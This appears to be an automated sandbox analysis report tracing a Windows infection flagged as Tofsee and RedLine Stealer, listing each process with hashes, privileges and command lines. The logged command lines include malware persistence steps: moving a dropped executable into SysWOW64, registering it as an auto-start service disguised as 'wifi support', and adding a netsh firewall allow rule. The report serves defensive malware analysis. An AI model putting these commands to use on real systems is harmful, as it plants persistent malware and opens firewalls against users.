                                                                                                                                                                                            MD5 hash:E4B33586BFDB5A9CD45F3038B8F4CCBD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                            Analysis Process: FA5C.exe PID: 796 Parent PID: 3424

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:29
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Imagebase:0x530000
                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                            Analysis Process: svchost.exe PID: 4800 Parent PID: 568

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:30
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: cmd.exe PID: 5768 Parent PID: 4752

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:32
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
                                                                                                                                                                                            Imagebase:0x11d0000
                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 5152 Parent PID: 5768

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:32
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: cmd.exe PID: 4692 Parent PID: 4752

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:33
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
                                                                                                                                                                                            Imagebase:0x11d0000
                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 6316 Parent PID: 4692

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:33
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: sc.exe PID: 4044 Parent PID: 4752

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:34
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 2860 Parent PID: 4044

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:34
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: sc.exe PID: 240 Parent PID: 4752

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:35
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 6480 Parent PID: 240

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:36
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: sc.exe PID: 1740 Parent PID: 4752

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:36
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\sc.exe" start txlhcyih
                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 2216 Parent PID: 1740

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:37
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: netsh.exe PID: 6536 Parent PID: 4752

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:37
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                            Imagebase:0x9f0000
                                                                                                                                                                                            File size:82944 bytes
                                                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: gaystiqf.exe PID: 4588 Parent PID: 568

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:37
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:12005888 bytes
                                                                                                                                                                                            MD5 hash:6D07EFE4270BD10431D8E32CADCFF4E7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                            Analysis Process: conhost.exe PID: 4620 Parent PID: 6536

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:38
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Analysis Process: svchost.exe PID: 5288 Parent PID: 4588

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:39
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x110000
                                                                                                                                                                                            File size:44520 bytes
                                                                                                                                                                                            MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                            Analysis Process: FA5C.exe PID: 1496 Parent PID: 796

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:43
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Imagebase:0xab0000
                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.824314083.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.824767570.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.823843288.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.825252840.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                            Reset < >